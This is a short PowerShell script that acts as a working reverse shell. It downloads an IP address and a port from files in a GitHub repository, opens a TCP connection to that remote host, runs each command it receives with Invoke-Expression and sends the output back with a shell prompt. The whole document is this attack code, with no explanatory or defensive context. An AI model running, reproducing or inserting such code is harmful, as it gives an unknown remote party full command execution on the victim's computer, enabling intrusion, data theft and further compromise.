$dataURL = "https://raw.githubusercontent.com/X3D4L/pastebin/refs/heads/main/.dat/"

$var1 = (Invoke-WebRequest -Uri ($dataURL + "ip") -UseBasicParsing | Select-Object -ExpandProperty Content).Trim()
$var2 = (Invoke-WebRequest -Uri ($dataURL + "port") -UseBasicParsing | Select-Object -ExpandProperty Content).Trim()

$client = New-Object System.Net.Sockets.TCPClient($var1, $var2)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | ForEach-Object {0}

while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()
}
$client.Close()
